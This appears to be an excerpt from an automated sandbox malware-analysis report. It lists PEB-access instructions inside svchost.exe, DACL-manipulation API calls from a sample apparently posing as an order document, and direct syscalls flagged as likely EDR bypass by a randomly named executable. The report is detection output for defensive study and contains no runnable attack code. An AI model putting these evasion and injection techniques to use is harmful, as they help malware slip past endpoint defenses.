Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BCBF0 mov eax, dword ptr fs:[00000030h]	1_2_039BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]	1_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]	1_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]	1_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]	1_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]	1_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]	1_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]	1_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]	1_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]	1_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395EB20 mov eax, dword ptr fs:[00000030h]	1_2_0395EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395EB20 mov eax, dword ptr fs:[00000030h]	1_2_0395EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F8B28 mov eax, dword ptr fs:[00000030h]	1_2_039F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F8B28 mov eax, dword ptr fs:[00000030h]	1_2_039F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039C6B40 mov eax, dword ptr fs:[00000030h]	1_2_039C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039C6B40 mov eax, dword ptr fs:[00000030h]	1_2_039C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039FAB40 mov eax, dword ptr fs:[00000030h]	1_2_039FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039D8B42 mov eax, dword ptr fs:[00000030h]	1_2_039D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392CB7E mov eax, dword ptr fs:[00000030h]	1_2_0392CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03968A90 mov edx, dword ptr fs:[00000030h]	1_2_03968A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]	1_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]	1_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]	1_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]	1_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]	1_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]	1_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]	1_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]	1_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]	1_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A04A80 mov eax, dword ptr fs:[00000030h]	1_2_03A04A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03938AA0 mov eax, dword ptr fs:[00000030h]	1_2_03938AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03938AA0 mov eax, dword ptr fs:[00000030h]	1_2_03938AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03986AA4 mov eax, dword ptr fs:[00000030h]	1_2_03986AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03930AD0 mov eax, dword ptr fs:[00000030h]	1_2_03930AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03964AD0 mov eax, dword ptr fs:[00000030h]	1_2_03964AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03964AD0 mov eax, dword ptr fs:[00000030h]	1_2_03964AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03986ACC mov eax, dword ptr fs:[00000030h]	1_2_03986ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03986ACC mov eax, dword ptr fs:[00000030h]	1_2_03986ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03986ACC mov eax, dword ptr fs:[00000030h]	1_2_03986ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396AAEE mov eax, dword ptr fs:[00000030h]	1_2_0396AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396AAEE mov eax, dword ptr fs:[00000030h]	1_2_0396AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BCA11 mov eax, dword ptr fs:[00000030h]	1_2_039BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03954A35 mov eax, dword ptr fs:[00000030h]	1_2_03954A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03954A35 mov eax, dword ptr fs:[00000030h]	1_2_03954A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396CA24 mov eax, dword ptr fs:[00000030h]	1_2_0396CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395EA2E mov eax, dword ptr fs:[00000030h]	1_2_0395EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]	1_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]	1_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]	1_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]	1_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]	1_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]	1_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]	1_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940A5B mov eax, dword ptr fs:[00000030h]	1_2_03940A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940A5B mov eax, dword ptr fs:[00000030h]	1_2_03940A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039ACA72 mov eax, dword ptr fs:[00000030h]	1_2_039ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039ACA72 mov eax, dword ptr fs:[00000030h]	1_2_039ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396CA6F mov eax, dword ptr fs:[00000030h]	1_2_0396CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396CA6F mov eax, dword ptr fs:[00000030h]	1_2_0396CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396CA6F mov eax, dword ptr fs:[00000030h]	1_2_0396CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B89B3 mov esi, dword ptr fs:[00000030h]	1_2_039B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B89B3 mov eax, dword ptr fs:[00000030h]	1_2_039B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B89B3 mov eax, dword ptr fs:[00000030h]	1_2_039B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]	1_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]	1_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]	1_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]	1_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]	1_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]	1_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]	1_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]	1_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]	1_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]	1_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]	1_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]	1_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]	1_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039309AD mov eax, dword ptr fs:[00000030h]	1_2_039309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039309AD mov eax, dword ptr fs:[00000030h]	1_2_039309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039649D0 mov eax, dword ptr fs:[00000030h]	1_2_039649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039FA9D3 mov eax, dword ptr fs:[00000030h]	1_2_039FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039C69C0 mov eax, dword ptr fs:[00000030h]	1_2_039C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039629F9 mov eax, dword ptr fs:[00000030h]	1_2_039629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039629F9 mov eax, dword ptr fs:[00000030h]	1_2_039629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BE9E0 mov eax, dword ptr fs:[00000030h]	1_2_039BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BC912 mov eax, dword ptr fs:[00000030h]	1_2_039BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03928918 mov eax, dword ptr fs:[00000030h]	1_2_03928918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03928918 mov eax, dword ptr fs:[00000030h]	1_2_03928918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039AE908 mov eax, dword ptr fs:[00000030h]	1_2_039AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039AE908 mov eax, dword ptr fs:[00000030h]	1_2_039AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B892A mov eax, dword ptr fs:[00000030h]	1_2_039B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039C892B mov eax, dword ptr fs:[00000030h]	1_2_039C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B0946 mov eax, dword ptr fs:[00000030h]	1_2_039B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039D4978 mov eax, dword ptr fs:[00000030h]	1_2_039D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039D4978 mov eax, dword ptr fs:[00000030h]	1_2_039D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BC97C mov eax, dword ptr fs:[00000030h]	1_2_039BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03956962 mov eax, dword ptr fs:[00000030h]	1_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03956962 mov eax, dword ptr fs:[00000030h]	1_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03956962 mov eax, dword ptr fs:[00000030h]	1_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0397096E mov eax, dword ptr fs:[00000030h]	1_2_0397096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0397096E mov edx, dword ptr fs:[00000030h]	1_2_0397096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0397096E mov eax, dword ptr fs:[00000030h]	1_2_0397096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BC89D mov eax, dword ptr fs:[00000030h]	1_2_039BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03930887 mov eax, dword ptr fs:[00000030h]	1_2_03930887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395E8C0 mov eax, dword ptr fs:[00000030h]	1_2_0395E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396C8F9 mov eax, dword ptr fs:[00000030h]	1_2_0396C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396C8F9 mov eax, dword ptr fs:[00000030h]	1_2_0396C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039FA8E4 mov eax, dword ptr fs:[00000030h]	1_2_039FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BC810 mov eax, dword ptr fs:[00000030h]	1_2_039BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]	1_2_03952835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]	1_2_03952835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]	1_2_03952835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03952835 mov ecx, dword ptr fs:[00000030h]	1_2_03952835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]	1_2_03952835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]	1_2_03952835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396A830 mov eax, dword ptr fs:[00000030h]	1_2_0396A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039D483A mov eax, dword ptr fs:[00000030h]	1_2_039D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039D483A mov eax, dword ptr fs:[00000030h]	1_2_039D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03960854 mov eax, dword ptr fs:[00000030h]	1_2_03960854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03934859 mov eax, dword ptr fs:[00000030h]	1_2_03934859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03934859 mov eax, dword ptr fs:[00000030h]	1_2_03934859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03942840 mov ecx, dword ptr fs:[00000030h]	1_2_03942840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BE872 mov eax, dword ptr fs:[00000030h]	1_2_039BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BE872 mov eax, dword ptr fs:[00000030h]	1_2_039BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039C6870 mov eax, dword ptr fs:[00000030h]	1_2_039C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039C6870 mov eax, dword ptr fs:[00000030h]	1_2_039C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03962F98 mov eax, dword ptr fs:[00000030h]	1_2_03962F98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03962F98 mov eax, dword ptr fs:[00000030h]	1_2_03962F98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396CF80 mov eax, dword ptr fs:[00000030h]	1_2_0396CF80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A04FE7 mov eax, dword ptr fs:[00000030h]	1_2_03A04FE7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392EFD8 mov eax, dword ptr fs:[00000030h]	1_2_0392EFD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392EFD8 mov eax, dword ptr fs:[00000030h]	1_2_0392EFD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392EFD8 mov eax, dword ptr fs:[00000030h]	1_2_0392EFD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03932FC8 mov eax, dword ptr fs:[00000030h]	1_2_03932FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03932FC8 mov eax, dword ptr fs:[00000030h]	1_2_03932FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03932FC8 mov eax, dword ptr fs:[00000030h]	1_2_03932FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03932FC8 mov eax, dword ptr fs:[00000030h]	1_2_03932FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03970FF6 mov eax, dword ptr fs:[00000030h]	1_2_03970FF6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03970FF6 mov eax, dword ptr fs:[00000030h]	1_2_03970FF6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03970FF6 mov eax, dword ptr fs:[00000030h]	1_2_03970FF6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03970FF6 mov eax, dword ptr fs:[00000030h]	1_2_03970FF6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E6FF7 mov eax, dword ptr fs:[00000030h]	1_2_039E6FF7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03932F12 mov eax, dword ptr fs:[00000030h]	1_2_03932F12
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396CF1F mov eax, dword ptr fs:[00000030h]	1_2_0396CF1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E6F00 mov eax, dword ptr fs:[00000030h]	1_2_039E6F00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395EF28 mov eax, dword ptr fs:[00000030h]	1_2_0395EF28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392CF50 mov eax, dword ptr fs:[00000030h]	1_2_0392CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392CF50 mov eax, dword ptr fs:[00000030h]	1_2_0392CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392CF50 mov eax, dword ptr fs:[00000030h]	1_2_0392CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392CF50 mov eax, dword ptr fs:[00000030h]	1_2_0392CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392CF50 mov eax, dword ptr fs:[00000030h]	1_2_0392CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392CF50 mov eax, dword ptr fs:[00000030h]	1_2_0392CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396CF50 mov eax, dword ptr fs:[00000030h]	1_2_0396CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A04F68 mov eax, dword ptr fs:[00000030h]	1_2_03A04F68
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039D0F50 mov eax, dword ptr fs:[00000030h]	1_2_039D0F50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B4F40 mov eax, dword ptr fs:[00000030h]	1_2_039B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B4F40 mov eax, dword ptr fs:[00000030h]	1_2_039B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B4F40 mov eax, dword ptr fs:[00000030h]	1_2_039B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B4F40 mov eax, dword ptr fs:[00000030h]	1_2_039B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395AF69 mov eax, dword ptr fs:[00000030h]	1_2_0395AF69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395AF69 mov eax, dword ptr fs:[00000030h]	1_2_0395AF69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392AE90 mov eax, dword ptr fs:[00000030h]	1_2_0392AE90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392AE90 mov eax, dword ptr fs:[00000030h]	1_2_0392AE90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392AE90 mov eax, dword ptr fs:[00000030h]	1_2_0392AE90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03962E9C mov eax, dword ptr fs:[00000030h]	1_2_03962E9C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03962E9C mov ecx, dword ptr fs:[00000030h]	1_2_03962E9C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039CAEB0 mov eax, dword ptr fs:[00000030h]	1_2_039CAEB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039CAEB0 mov eax, dword ptr fs:[00000030h]	1_2_039CAEB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BCEA0 mov eax, dword ptr fs:[00000030h]	1_2_039BCEA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BCEA0 mov eax, dword ptr fs:[00000030h]	1_2_039BCEA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BCEA0 mov eax, dword ptr fs:[00000030h]	1_2_039BCEA0

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_009D81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_009D81F7

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009AA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_009AA395
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009AA364 SetUnhandledExceptionFilter,		0_2_009AA364

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
